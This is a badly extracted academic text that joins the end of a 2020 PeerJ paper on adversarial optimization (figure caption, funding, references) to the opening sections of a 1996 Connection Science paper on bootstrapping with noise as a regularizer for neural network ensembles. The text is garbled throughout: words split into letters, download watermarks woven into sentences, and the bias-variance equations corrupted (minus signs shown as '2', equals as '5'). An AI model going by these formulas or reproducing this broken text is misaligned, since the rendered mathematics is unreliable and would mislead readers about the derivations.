optimization step 10 3 10 2 Eu cl id ea n di st an ce to th e so lu tio n JSD linear AD logarithmic AD B 0 20 40 60 80 100 optimization step 100 2 × 10 1 3 × 10 1 4 × 10 1 6 × 10 1 Eu cl id ea n di st an ce to th e so lu tio n JSD AD, dropout AD, l2 C Figure 6 Convergence plots as functions of optimization step: (A) XOR-like synthetic dataset, (B) Pythia hyper-parameter tuning, (C) Pythia alignment. Curves are interpolated, median curves are shown as solid lines, bars indicate 25th and 75th percentiles. For visual clarity curves are interpolated/extrapo- lated up to the median total number of steps for the corresponding method. Full-size DOI: 10.7717/peerjcs.274/fig-6 ADDITIONAL INFORMATION AND DECLARATIONS Funding The research leading to these results has received funding from Russian Science Foundation under grant agreement N 19-71-30020. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Russian Science Foundation: 19-71-30020. Competing Interests The authors declare there are no competing interests. Author Contributions • Maxim Borisyak conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Tatiana Gaintseva analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Andrey Ustyuzhanin analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The code for the experiments is available at https://github.com/HSE-LAMBDA/rapid- ao/. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 21/24 https://peerj.com https://doi.org/10.7717/peerjcs.274/fig-6 https://github.com/HSE-LAMBDA/rapid-ao/ https://github.com/HSE-LAMBDA/rapid-ao/ http://dx.doi.org/10.7717/peerj-cs.274 REFERENCES Allison J, Amako K, Apostolakis J, Arce P, Asai M, Aso T, Bagli E, Bagulya A, Banerjee S, Barrand G, Beck B, Bogdanov A, Brandt D, Brown J, Burkhardt H, Canal P, Cano-Ott D, Chauvie S, Cho K, Cirrone G, Cooperman G, Corts-Giraldo M, Cosmo G, Cuttone G, Depaola G, Desorgher L, Dong X, Dotti A, Elvira V, Folger G, Francis Z, Galoyan A, Garnier L, Gayer M, Genser K, Grichine V, Guatelli S, Guye P, Gumplinger P, Howard A, Hivnov I, Hwang S, Incerti S, Ivanchenko A, Ivanchenko V, Jones F, Jun S, Kaitaniemi P, Karakatsanis N, Karamitros M, Kelsey M, Kimura A, Koi T, Kurashige H, Lechner A, Lee S, Longo F, Maire M, Mancusi D, Mantero A, Mendoza E, Morgan B, Murakami K, Nikitina T, Pandola L, Paprocki P, Perl J, Petrovi I, Pia M, Pokorski W, Quesada J, Raine M, Reis M, Ribon A, Fira AR, Romano F, Russo G, Santin G, Sasaki T, Sawkey D, Shin J, Strakovsky I, Taborda A, Tanaka S, Tom B, Toshito T, Tran H, Truscott P, Urban L, Uzhinsky V, Verbeke J, Verderi M, Wendt B, Wenzel H, Wright D, Wright D, Yamashita T, Yarba J, Yoshida H. 2016. Recent developments in Geant4. Nuclear Instruments and Methods in Physics Research Section A: Accelerators, Spectrometers, Detectors and Associated Equipment 835:186–225 DOI 10.1016/j.nima.2016.06.125. Arjovsky M, Chintala S, Bottou L. 2017. Wasserstein gan. ArXiv preprint. arXiv:1701.07875. Baydin AG, Shao L, Bhimji W, Heinrich L, Naderiparizi S, Munk A, Liu J, Gram- Hansen B, Louppe G, Meadows L, Torr P, Lee V, Cranmer K, Prabhat M, Wood F. 2019. Efficient probabilistic inference in the quest for physics beyond the standard model. In: Advances in neural information processing systems. 5459–5472. Bellemare MG, Danihelka I, Dabney W, Mohamed S, Lakshminarayanan B, Hoyer S, Munos R. 2017. The cramer distance as a solution to biased wasserstein gradients. ArXiv preprint. arXiv:1705.10743. Choi Y, Choi M, Kim M, Ha J-W, Kim S, Choo J. 2018. StarGAN: unified generative adversarial networks for multi-domain image-to-image translation. In: 2018 IEEE/CVF conference on computer vision and pattern recognition. 8789–8797. Dumoulin V, Belghazi I, Poole B, Mastropietro O, Lamb A, Arjovsky M, Courville A. 2016. Adversarially learned inference. ArXiv preprint. arXiv:1606.00704. Friedman JH. 2001. Greedy function approximation: a gradient boosting machine. Annals of Statistics 29(5):1189–1232. Goodfellow I, Pouget-Abadie J, Mirza M, Xu B, Warde-Farley D, Ozair S, Courville A, Bengio Y. 2014. Generative adversarial nets. In: Advances in neural information processing systems. 2672–2680. Gulrajani I, Ahmed F, Arjovsky M, Dumoulin V, Courville AC. 2017. Improved training of wasserstein gans. In: Advances in neural information processing systems. 5767–5777. Hossain S, Jamali K, Li Y, Rudzicz F. 2018. ChainGAN: a sequential approach to GANs. ArXiv preprint. arXiv:1811.08081. Ilten P, Williams M, Yang Y. 2017. Event generator tuning using Bayesian optimization. Journal of Instrumentation 12(04):Article P04028 DOI 10.1088/1748-0221/12/04/P04028. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 22/24 https://peerj.com http://dx.doi.org/10.1016/j.nima.2016.06.125 http://arXiv.org/abs/1701.07875 http://arXiv.org/abs/1705.10743 http://arXiv.org/abs/1606.00704 http://arXiv.org/abs/1811.08081 http://dx.doi.org/10.1088/1748-0221/12/04/P04028 http://dx.doi.org/10.7717/peerj-cs.274 Isola P, Zhu J-Y, Zhou T, Efros AA. 2017. Image-to-image translation with conditional adversarial networks. In: Proceedings of the IEEE conference on computer vision and pattern recognition. 1125–1134. Karras T, Aila T, Laine S, Lehtinen J. 2017. Progressive growing of gans for improved quality, stability, and variation. ArXiv preprint. arXiv:1710.10196. Kingma DP, Ba J. 2014. Adam: a method for stochastic optimization. ArXiv preprint. arXiv:1412.6980. Kodali N, Abernethy J, Hays J, Kira Z. 2017. On convergence and stability of gans. ArXiv preprint. arXiv:1705.07215. Li J, Madry A, Peebles J, Schmidt L. 2017. Towards understanding the dynamics of generative adversarial networks. ArXiv preprint. arXiv:1706.09884. Liu H, Simonyan K, Yang Y. 2018. Darts: differentiable architecture search. ArXiv preprint. arXiv:1806.09055. Louppe G, Hermans J, Cranmer K. 2017. Adversarial variational optimization of non- differentiable simulators. ArXiv preprint. arXiv:1707.07113. Mescheder L, Geiger A, Nowozin S. 2018. Which training methods for gans do actually converge? In: International conference on machine learning. 3478–3487. Metz L, Poole B, Pfau D, Sohl-Dickstein J. 2016. Unrolled generative adversarial networks. In: ICLR. Mockus J. 2012. Bayesian approach to global optimization: theory and applications. vol. 37. Dordrecht: Springer Science & Business Media. Prokhorenkova L, Gusev G, Vorobev A, Dorogush AV, Gulin A. 2018. CatBoost: unbiased boosting with categorical features. In: Advances in neural information processing systems. 6638–6648. Radford A, Metz L, Chintala S. 2015. Unsupervised representation learning with deep convolutional generative adversarial networks. ArXiv preprint. arXiv:1511.06434. Roth K, Lucchi A, Nowozin S, Hofmann T. 2017. Stabilizing training of generative adversarial networks through regularization. Advances in neural information pro- cessing systems. 2018–2028 Available at https://papers.nips.cc/paper/6797-stabilizing- training-of-generative-adversarial-networks-through-regularization.pdf . Simonyan K, Zisserman A. 2014. Very deep convolutional networks for large-scale image recognition. ArXiv preprint. arXiv:1409.1556. Sjöstrand T, Ask S, Christiansen JR, Corke R, Desai N, Ilten P, Mrenna S, Prestel S, Rasmussen CO, Skands PZ. 2015. An introduction to PYTHIA 8.2. Computer Physics Communications 191:159–177. Sjöstrand T, Mrenna S, Skands P. 2006. PYTHIA 6.4 physics and manual. Journal of High Energy Physics 2006(05):Article 026. Skands P, Carrazza S, Rojo J. 2014. Tuning PYTHIA 8.1: the Monash 2013 tune. The Eu- ropean Physical Journal C 74(8):Article 3024 DOI 10.1140/epjc/s10052-014-3024-y. Sønderby CK, Caballero J, Theis L, Shi W, Huszár F. 2016. Amortised map inference for image super-resolution. ArXiv preprint. arXiv:1610.04490. Sønderby CK, Caballero J, Theis L, Shi W, Huszár F. 2016. Amortised map inference for image super-resolution. ArXiv preprint. arXiv:1610.04490. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 23/24 https://peerj.com http://arXiv.org/abs/1710.10196 http://arXiv.org/abs/1412.6980 http://arXiv.org/abs/1705.07215 http://arXiv.org/abs/1706.09884 http://arXiv.org/abs/1806.09055 http://arXiv.org/abs/1707.07113 http://arXiv.org/abs/1511.06434 https://papers.nips.cc/paper/6797-stabilizing-training-of-generative-adversarial-networks-through-regularization.pdf https://papers.nips.cc/paper/6797-stabilizing-training-of-generative-adversarial-networks-through-regularization.pdf http://arXiv.org/abs/1409.1556 http://dx.doi.org/10.1140/epjc/s10052-014-3024-y http://arXiv.org/abs/1610.04490 http://arXiv.org/abs/1610.04490 http://dx.doi.org/10.7717/peerj-cs.274 Srivastava N, Hinton G, Krizhevsky A, Sutskever I, Salakhutdinov R. 2014. Dropout: a simple way to prevent neural networks from overfitting. The Journal of Machine Learning Research 15(1):1929–1958. The ATLAS Collaboration. 2010. The ATLAS simulation infrastructure. European Physi- cal Journal C: Particles and Fields 70(3):823–874 DOI 10.1140/epjc/s10052-010-1429-9. Wierstra D, Schaul T, Glasmachers T, Sun Y, Peters J, Schmidhuber J. 2014. Natural evolution strategies. The Journal of Machine Learning Research 15(1):949–980. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 24/24 https://peerj.com http://dx.doi.org/10.1140/epjc/s10052-010-1429-9 http://dx.doi.org/10.7717/peerj-cs.274 work_o6gmakdor5esthz2os3fr7tb4q ---- Bootstrapping with Noise: An Effective Regularization Technique This article was downloaded by: [ ] On: 22 September 2011, At: 03:16 Publisher: Taylor & Francis Informa Ltd Registered in England and Wales Registered Number: 1072954 Registered office: Mortimer House, 37-41 Mortimer Street, London W1T 3JH, UK Connection Science Publication details, including instructions for authors and subscription information: http://www.tandfonline.com/loi/ccos20 Bootstrapping with Noise: An Effective Regularization Technique YUVAL RAVIV a & NATHAN INTRATOR a a School of Mathematical Sciences, Sackler Faculty of Exact Sciences, Tel-Aviv University, Ramat Aviv, 69978, Israel Available online: 01 Jul 2010 To cite this article: YUVAL RAVIV & NATHAN INTRATOR (1996): Bootstrapping with Noise: An Effective Regularization Technique, Connection Science, 8:3-4, 355-372 To link to this article: http://dx.doi.org/10.1080/095400996116811 PLEASE SCROLL DOWN FOR ARTICLE Full terms and conditions of use: http://www.tandfonline.com/page/ terms-and-conditions This article may be used for research, teaching and private study purposes. Any substantial or systematic reproduction, re-distribution, re-selling, loan, sub-licensing, systematic supply or distribution in any form to anyone is expressly forbidden. The publisher does not give any warranty express or implied or make any representation that the contents will be complete or accurate or up to date. The accuracy of any instructions, formulae and drug doses should be independently verified with primary sources. The publisher shall not be liable for any loss, actions, claims, proceedings, demand or costs or damages whatsoever or howsoever caused http://www.tandfonline.com/loi/ccos20 http://dx.doi.org/10.1080/095400996116811 http://www.tandfonline.com/page/terms-and-conditions http://www.tandfonline.com/page/terms-and-conditions arising directly or indirectly in connection with or arising out of the use of this material. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 C onnection Scien ce, V ol. 8, N os 3 & 4, 1996, 355± 372 B ootstrapping with N oise: A n E ffective R egu larization T echniqu e Y U V A L R A VIV & N AT H A N IN T RA T OR Bootstrap sam ples w ith n oise are shown to be an effective sm ooth ness and capacity control technique for tra ining feedforward network s and for other statistical m ethods such as genera lized additive m odels. It is shown that noisy bootstrap perform s best in conjunc tion w ith w eight-decay regula riz ation and ensemble averaging. T he tw o-sp iral problem , a highly non-lin ear, noise-free data, is used to dem onstra te these ® ndings. T he com bination of noisy bootstrap and ensemble averaging is also show n useful for generalized additive m odelling, and is also dem onstra ted on the w ell-k now n C leveland heart data. K EYW ORDS : N oise injection, com b ining estim ators, pattern classi® cation, two-spira l prob lem , clinical data analysis. 1. Intro du ction T he boo tstrap technique h as b ecom e one of the majo r tools for prod ucing em pirical con® dence intervals of estimated param eters or predictors (Efro n & T ibshira ni, 1993). One way to view b ootstrap is as a m ethod to sim ulate noise inherent in the data, and thus increase effec tively the num ber of training patterns. A sim p le b ootstrap p rocedure am ounts to sam p ling with return fro m the training data, and constructing several training sets, all with the sam e size as the original training set. Later, the variab ility betw een the estim ated param eters can b e m easu red, and give som e indication abo ut the true variab ility of the m odel param eters arisin g from the data. Furthermore, variabi lity of the p rediction, or error bars on the prediction, can also be estim ated in this way. O ne varian t of b ootstrap involve s estim ation of a m odel of the form y 5 f(x) 1 « fo r som e p aram etric fam ily to which f belongs, and a noise « wh ich is assu m ed to be sm all with zero m ean. O nce an em pirical fu nction fÃ h as been estim ated fro m n training sam ples, there rem ains a noise vector « 5 ( « 1, ¼ , « n). O ne can then sam p le from the em pirical distribu tion of the noise b y sam pling (w ith return) from « i and constructing new sam ples of the form (x * i , y * i ), in which « i was replac ed by « *i sam pled from the abo ve set. Clearly, this app roach can b e easily extended to a Y. Raviv and N . Intrator, School of M athematical Sciences, Sackler Faculty of E xact Sciences, Tel-Aviv U niversity, Ram at Aviv 69978, Israel. E-mail: {yuv,nin}@ math.tau.ac.il. Present address of N . In trator, Institute of Brain and N eural System s, Box 1843, Brown U niversity, Providence, RI 02912, U SA. 0954± 0 091/96/030355± 1 8 $7.50 Ó 1996 Journals Oxford Ltd D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 356 Y. R aviv & N . Intrator sm oothed bo otstrap (E fron & T ibshirani, 1993) by sam p ing fro m the em p irical distrib ution by « i rather than just sam pling from the set of « i’ s. In such case, one can increase the size of each bo ostrap set, sin ce due to the noise, the differen t sets are su f® ciently independent. It sh ould b e noted that if fÃ is b iase d, the noise vector m ay be over-estim ated. F or classi® cation p roblems, the form y 5 f(x 1 « ) m ay b e more ap pro priate. In this case, using noise injection to the inputs during training can im prove the generalization p roperties of the estim ator (Sietsm a & D ow, 1991). R ecently, B ish op (1995) has sh own that training w ith sm all am ounts of noise is locally equivalent to sm oothness regularization. In this paper, we give a diffe rent interpretation to noise added to the input during training, and view it as a regularizing param eter that controls, in conju nction w ith ensem b le averaging, the cap acity and the sm oothness of the estim ator. T he m ajo r role of this noise is to push diffe rent estimators to diffe rent local m inim a, and so prod uce a m ore independent set of estim ators. B est perform ance is then achieved by ave raging over the estim ators. For this regularization, the level of the noise m ay b e larger than the `true’ level wh ich can b e indirectly estim ated. Since we want to study the effec t of bo otstrappin g with noise on the sm oothness of the estim ator, separated from the task of inp ut noise estim ation, w e consider a highly non-lin ear, noise-fre e classi® cation prob lem , and sho w that even in this extreme case, addition of noise during training im proves results signi® cantly. W e cho se a p roblem that is very dif® cult fo r fe edfo rw ard neural networks (N N s). It is dif® cult due to the h ighly non-lin ear nature of the decision bo undaries, and the fac t that these non-lin earities are easier to represent in local radially sym m etric fu nctions rath er than in ridge fu nctions such as those given by fe edforw ard sigm oidal fu nctions. Since the training data are given w ith no noise, it seems unreasonable to train a netw ork with noise, but we sho w that even in this case training with noise is a very effective app roach fo r sm oothing the estim ator. In addition to dem onstrating our m ethod on a diffe rent class of predictorsÐ the generalized additive m odelsÐ we also app ly it to another well-kn own data setÐ the C leveland heart data (D etrano et al., 1989). 2. T heoretical C onsideratio ns T here are a num ber of factors that have to be app lied carefully w hen trying to regularize an estim ator. T he regularization is aim ed at ® nding an op tim al trade-off between the varian ce and b ias of the estim ator (G em an et al., 1992), and fo r best perfo rm ance one has to utilize this decom po sition of the error fu nction. Th e m otivation to our ap pro ach follow s from a key ob servatio n regarding the b ias variance decom positio n, nam ely the fact that ensem b le ave raging does not affe ct the bias p ortion of the error, b ut reduces the varian ce w hen the estim ators on wh ich averaging is done are independent. 2.1. Bias/V ariance T rade-off for En semble of P redictors T he classi® cation pro blem is to estim ate a fu nction f X (x) of observed data charac teristics x, predicting class labe l y, b ased on a given training set X 5 {(x 1, y1)}, . . . , (X L, Y L)} using som e m easure of the estim ation error on X . D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 Bootstrapping w ith N oise 357 A good estim ator w ill perfo rm well not only on the training set, but also on new valid ation sets wh ich were not used during estim ation. Evalu ation of the perfo rm ance of the estim ator is com m only done via the m ean squ ared error (M SE) distance b y taking the expectation with respect to the (unknown) p robability distribu tion P of y: E[(y 2 f X (x))2 u x, X ] T his can be decom p osed into E[(y 2 f X (x))2 u x, X ] 5 E[(y u x])2 u x, X ] 1 E[(f X (x) 2 E [y u x])2] T he ® rst term does not depend on the training data X or on the estim ator f X (x); it m easu res the am ount of noise or variab ility of y given x. H ence, f can b e evaluated using E[(f X (x) 2 E[y u ])2] T he em pirical M SE of f is given by E X [(f X (x) 2 E[y u x])2] wh ere E X represents expectation with resp ect to all possib le training sets X of ® xed size. T o see fu rther the perfo rm ance under M SE, we decom po se the error to b ias and varian ce com po nents to get E X [(f X (x) 2 E[y u x)2] 5 (E X [f X (x)] 2 E[y u x])2 1 E X [(f X (x) 2 E X [fD (x)])2] (1) T he ® rst term on the right-han d sid e is called the b ias of the estim ator and the second term is called the variance. W hen training on a ® xed training set X , reducing the bias with resp ect to this set m ay increase the variance of the estimator and contribute to po or generalization perform ance. T his is known as the trade-off between variance and bias. T ypic ally, varian ce is reduced by sm oothing; how ever, this m ay introduce bias (since, fo r exam ple, it m ay blur sharp peaks). B ias is reduced by prio r know ledge. W hen prio r know ledge is used also fo r sm oothing, it is likely to reduce the overall M SE of the estim ator. W hen training N N s, the varian ce arise s from tw o term s. T he ® rst term com es from inherent data ran dom ness and the second term com es fro m the non- identi® ability of the m odel, nam ely, the fac t that for a given training data, there m ay be several (local) m inim a of the error su rface. 1 C onsid er the ensem ble ave rage fÅ of several predictors, e.g. N N s with diffe rent random initial w eights which are trained on data with added G aussian noise: fÅ (x ) 5 1 N O N i 5 1 f i (x ) T hese predictors are identically distributed and, thus, the varian ce contribution (equation (1)) becom es (we om it x and X for clarity) E [( fÅ 2 E [ fÅ ])2 ] 5 E F S 1N O f i 2 E F 1 N O f i G D 2 G 5 E F S 1N O f i D 2 G 1 S E F 1N O f i G D 2 2 2E F 1N O f i E F 1 N O f i G G D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 358 Y. R aviv & N . Intrator 5 E F S 1N O f i D 2 G 2 S E F 1N O f i G D 2 (2) T he ® rst term on the righ t-h and sid e can be rewritten as E F S 1N O f i D 2 G 5 1N 2 O E [ f 2i ] 1 2 N 2 O i , j E [ f i f j ] and the second term gives S E F 1N O f i G D 2 5 1 N 2 O E [ f i ] 1 2N 2 Oi , j E [ f i ]E [ f j ] Plugging these equalities in equation (2) gives E [( fÅ 2 E [ fÅ ])2 ] 5 1 N 2 O {E [ f 2i ] 2 (E [ f i ])2} 1 2N 2 Oi , j {E [ f i f j ] 2 E [ f i ]E [ f j ]} (3) If the predictors { f i } are highly correlated, fo r exam p le if f i 5 f j 5 f fo r all i , j , then the abo ve equation becom es Var ( fÅ ) 5 1 N V ar ( f ) 1 2 N 2 N ( N 2 1) 2 V ar ( f ) 5 Var ( f ) nam ely, there is no reduction in varian ce 2 in this case. If the predictors are identically distrib uted and independent, then the second term drop s and we are left with Var ( fÅ ) 5 1 N V ar ( f i ) N ote that E [ f i f j ] 2 E [ f i ]E [ f j ] 5 E ({ f i 2 E [ f i ]}{ f j 2 E [ f j ]}) T hus, the notion of independence can be understood as independence of the deviations of each predictor from the expected valu es of the p redictor, which can be replaced (due to linearity) by E ({ f i 2 E [ fÅ ]}{ f j 2 E [ fÅ ]}) and is thus interpreted as an independence of the prediction variation aro und a com m on m ean. T he success of ensem ble averag ing of N N s in the past (B reim an, 1994; H ansen & Salam on, 1990; P errone, 1993; W olp ert, 1992) is due to the fact that N N s have in general m any local m inim a, and thus even with the sam e training set, diffe rent local m inim a are fo und when starting from diffe rent ran dom initial conditions. T hese diffe rent local m inima lead to so m ewh at independent predictors, and thus the averaging can reduce the varian ce. W hen a larger set of independent networks is needed, but no m ore data are availab le, data reuse m ethods can help. Bootstrap- ping (Breim an, 1994) has been very helpfu l, since by resam p ling (with return) from the training data, the independence of the training sets is increased, and hence, the independence of the estim ators, leading to im prove d ensem ble results. Sm oothed bo otstrap (K rogh & H ertz, 1992; R ipley, 1996) is potentially m ore usefu l sin ce larger sets of independent training sam ples can be generated. Th e sm oothed bo otstrap approa ch am ounts to generating larger data sets by sim ulating the true noise in the data. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 Bootstrapping w ith N oise 359 3. T he B ootstra p E nsem ble w ith N oise A lgorithm In the boo tstrap ensem ble with noise (B EN ), w e p ush the idea of noise injection fu rther; we observe that adding noise to the inputs increases the ® rst term on the right-han d sid e of equation (3), i.e. adds varian ce to each estim ator, but, on the other han d, decreases the contribution of the second term on the right-han d sid e as it increases the independence between estim ators. Instead of usin g the `true’ noise (estim ated from the data) for b ootstrap, we seek an optim al noise level which gives the sm allest contribution to the error fro m the sum of the two com po nents of the varian ce. It is im po ssible to calculate the optimal varian ce of the G aussian noise without k nowing f explicitly; therefore, the value of this varian ce rem ains a regularization term : a param eter which has to be estim ated so as to m inim ize the total contribution of the varian ce to the error. Furtherm ore, sin ce the injection of noise increase s the independence betw een diffe rent training sets, we can use bo otstrap sets that are larger than the original training set. Th is does not affe ct the bias (if the noise is sym m etric arou nd zero) but can reduce the varian ce. N ote that the bias contribution to the error is not affe cted by introducing the ensem ble- averag e estim ator due to linearity of expectations. It fo llows that the BEN approa ch has the po tential of reducing the contribution of the varian ce term to the total erro r. W e thus sho uld seek a differen t trade-off po int b etween the contribution of the varian ce and the b ias. In other words, we are able to use large (unbiased ) networks w ithout being affe cted by the large varian ce assoc iated w ith su ch networks. T his obse rvatio n im plies that the estim ation of optim al noise levels shou ld not be based on a single estim ator perform ance, b ut rath er base d on the ensem ble perfo rm ance. Th e large varian ce of each sin gle network in the ensem ble can be tem pered w ith a regularization such as w eight decay (K rogh & H ertz, 1992; R ipley, 1996), but, again, the estim ation of the optim al regularization factor sho uld be done on the ensem ble-averaged perfo rm - ance. Breiman (1994) and R ipley (1996) sho w com pelling em pirical evidence fo r the im po rtance of weight decay as a single network stab ilizer. Our resu lts con® rm this fact under the BEN m odel. T he BEN Algorithm · Let {( x i , y i )} be a set of training p atterns for i 5 1, . . . , N . · Let « 5 { « 1, . . . , « J }. · Let l 5 { l 1, . . . , l I }. · F or a noise level « j estim ate an op tim al penalty term fo r weight decay l i : Ð Fix a size K fo r the bo otstrap sam ple, su ch that K @ N (we used K 5 10N ). Ð Let s 1, s 2 , . . . , s K b e a set of indices, chosen fro m a unifo rm distribution, s i , U (1, N ). Ð For a « j , create a noisy b ootstrap resam p le of the training set inputs: { x s i 1 z i }i 5 1,...,K and the corresp onding resam pled outputs { y s i }i 5 1,...,K wh ere z i is a vector who se com po nents are N (0, « 2j ). Ð Train several networks with the noisy sam ples using weight decay l 1, . . . , l I . Ð G enerate an ensem ble averag e of the set of netw orks. Ð Ch oose via cross-v alidation or a test set, the op tim al weight decay l . · R epeat the process for the new choice of noise « j until there is no im pro vem ent in prediction. In the sim ple case, the sam e noise level is used for each dim ension. T his is su itable D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 360 Y. R aviv & N . Intrator F igure 1. Th e two-spira ls training data (left). T raining points with noiseÐ standard deviation, SD 5 0.3 (right). A s can b e seen, the noise level that contam inates the data causes objects to cross the virtual bo undary de® ned b y the data, i.e. the noise leads to wrong class lab elling for the training data. Th is reduces perfo rm ance of sin gle predictors, but the added independence b etween the predictors leads to im proved ensem ble perform ance. fo r problem s in wh ich each of the dim ensions are on the sam e scale, or, m ore precisely, wh en the noise distribu tion is sim ilar in differen t data dim ensions. W hen all covariates have the sam e interpretation, e.g. sim ilar m easu rem ents taken at differen t tim e steps, or w hen dealing with pixel data, su ch noise assu m ption is adequate; ho wever, wh en the noise is non-h om ogeneous in spac e, has a non- diagonal covariance m atrix or wh en differen t dim ensions represent com pletely differen t m easurem ents, it is best to estim ate the diffe rent noise levels in each dim ension sep arately. W hen this is too costly, or there is insu f® cient data fo r robu st estim ation, a quick solution is to sph ere the data by setting the varian ce in each dim ensio n to b e the sam e and with zero m ean. 3.1. T he T w o-sp irals Prob lem T he `tw o-spira ls’ p roblem consists of a training set with 194 X ± Y valu es, h alf of wh ich are to prod uce a 1 output and half a 0 output. T hese training p osts are arran ged in tw o interlocking sp irals that go aro und the origin three tim es, as sh own in F igure 1. T he problem was p ropo sed to the C M U benchm ark by A lexis W ieland of M ITR E Corpo ration (see A ppe ndix A for a description of the problem ). It ap pears to be extrem ely hard fo r bac kpropo gation networks due to its h igh non-lin earity. It is easy to see that the two-d im ensional po ints of the spirals could not b e separated by a sm all com bination of linear separators. Lang and W itbrock (1988) prop osed a 2± 5± 5± 5± 1 network with sh ort-cuts usin g 138 weights. T hey used a variant of the q uick-p rop learn ing algorithm (Fahlm an, 1989) with weight decay. T hey claim ed that the prob lem could not be solve d with sim pler architecture (i.e. less laye rs or without sho rt-cuts). T heir result on the sam e data set seem s to give po or generalization results. Baum and Lang (1991) dem onstrated that there are m any sets of weights that would cause a 2± 50± 1 network to be consistent with the training set; ho wever, the sin gle-layer feedfo rw ard architecture trained with error bac kprop agation was unable to ® nd any of them when starting w ith ran dom initial weights. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 Bootstrapping w ith N oise 361 F ahlm an and Lebiere (1990) used the cascade-correlation architecture for this prob lem . T hey got b etter resu lts, b ut still little `spiraln ess’ . Recently, D effu ant (1995) su ggested the `perceptron m em b ran e’ m ethod that uses piecewise linear surfaces as discrim inators, and applied it to the sp iral prob lem . H e used 29 perceptrons b ut had dif® culties cap turing the structure of the spirals due to the piecewise linearity of his decision bo undaries. T he two-spiral problem w as cho sen for this study because it is a hard prob lem fo r bac kpropagation netw orks due to h igh non-linearity, it is a noise-free problem , and the generalization perform ance of diffe rent predictors can be easily visualized on the two-d im ensional plan e. In Section 5, we dem onstrate our m ethod on another well-know n m ach ine- learn ing problem , the prediction of coronary artery disease b ased on the Cleveland heart data, wh ich reside in the U niversity of C alifo rnia at Irvine (U CI) m ach ine- learn ing repository (M urphy & A ha, 1992). 4. R esults on the S piral D a ta 4.1. Feedforward N etwork Architecture W e used Riple y’ s (1996) S-P lus N N ET pac kage, wh ich im plem ents bac kpropaga- tion. T he m inim ization criterion is M SE with w eight-d ecay regularization of the fo rm E 5 O p u t p 2 y p u 2 1 l O i, j w 2 i, j wh ere t p is the target and y p the output fo r the p th exam p le pattern. w i , j are the weights and l is a param eter that controls the am ount of w eight decay regulariza- tion. T he network architecture w as 2± 30± 1 (two inp uts, 30 hidden units and one output). T he ® rst and last laye rs were fu lly connected to the hidden laye r giving a total of 121 weights. Th e transfe r fu nction of the hidden and output units was the logistic sigm oidal fu nction. Th e initial weights were ran dom from U ( 2 0.7, 0.7). It shou ld be noted here that alth ough w e are training 5± 40 networks, the effe ctive num ber of param eters is not m ore (and probab ly even less) than the num ber of param eters fo r a sin gle network. T his is because we do not have the ¯ exibility to estim ate an optim al com bination of predictors, but rather take the sim ple averag e of them. B ase line results were obtained by training 40 network s without any regulariza- tion. W e derived then an averag e p redictor wh ose output is the mean of all the 40 nets’ outputs (F igure 2 (top left)). T he p redictor h ad no sm oothness constrain ts and therefore fou nd relatively linear bo undaries (this can also be seen in Figure 3 (top left), where a ® ve-n et ensem ble averag e is taken). 4.1.1 . E ffect of tra ining with noise on a ¯ exible predictor. W e trained 30 hidden-unit networks using the b ootstrap m ethod (as describ ed in Section 3), with noise SD ranging from « 5 0 to « 5 0.8, and K 5 10N . F igure 3 dem onstrates the effec t of noise on the p redictor. Each im age is a thresho ld output of a ® ve-net ensem ble averag e predictor. N oise level goes fro m « 5 0 in the upp er left im age through « 5 0.8 in the lower right. Th e classi® cation results are draw n on a uniform grid of 100 3 100 p oints (nam ely, a m uch larger test set) so as to get a clear view of the D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 362 Y. R aviv & N . Intrator F igure 2. Sum m ary of 40-n et ensemb le resu lts. T op left: N o constrain ts ( no w eight decay or noise). Top righ t: Op tim al weight decay ( l 5 3e 2 4) and no noise. Bottom left: O ptim al noise (G aussian SD 5 0.35) and zero w eight decay. Bottom right: O ptim al noise and optim al weight decay. T he classi® cation threshold in this ® gure and the fo llowing ones is 0.5. classi® cation bo undaries de® ned by the classi® er. It can be seen that for sm all noise levels « , the ensemb le ave rage predictor is unable to ® nd any sm ooth structure in the data and m erely over-® ts to the training data. F or m oderate levels of noise, a better structure can be fo und, and for large levels of the noise, the data are so corrup ted that again no structure can b e fou nd. T he optim al noise SD was arou nd « 5 0.35. 4.1.2 . E ffect of weight-d ecay regula riz ation. W eight-d ecay regularization involve s ® nding an optim al param eter l that controls the am ount of w eight decay versu s the bias of the net. W e trained networks with differen t l ’ s and fou nd that optim al valu es were aro und l 5 3e 2 4. W h en com paring the effe ct of ave raging alone with the effe ct of regularization via weight decay with no averaging, it turns out that the bo otstrap m ethod (averaged over differen t initial network w eights) h as better generalization p roperties than the weight-d ecay m ethod. The w eight-d ecay regu- larization does not generaliz e well on the outer points, w here the training data are m ore sparse . 4.1.3 . A pplyin g bootstrap to netw orks with weight decay. O ur best results w ere obtained when app lying the B EN m ethod to netw orks with optim al weight-decay regularization. Figure 4 demonstrates the effe ct of bo otstrap with noise on the perfo rm ance of a ® ve-n et ensem ble trained with optim al weight decay. The effe ct of ensem ble averaging over network s that were trained with diffe rent ran dom initial conditions only is dem onstrated in the top left im age w hich represents no D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 Bootstrapping w ith N oise 363 F igure 3. Effe ct of training with diffe rent levels of G aussian noise. Ensem bles of ® ve networks with no w eight decay and a varyin g degree of noise (top left is zero noise, bottom right is noise with SD 5 0.8). noise during training. O ptim al noise valu es are sim ilar to those obtained w hen training with no weight decay, and are su rp risin gly high (see Figure 1 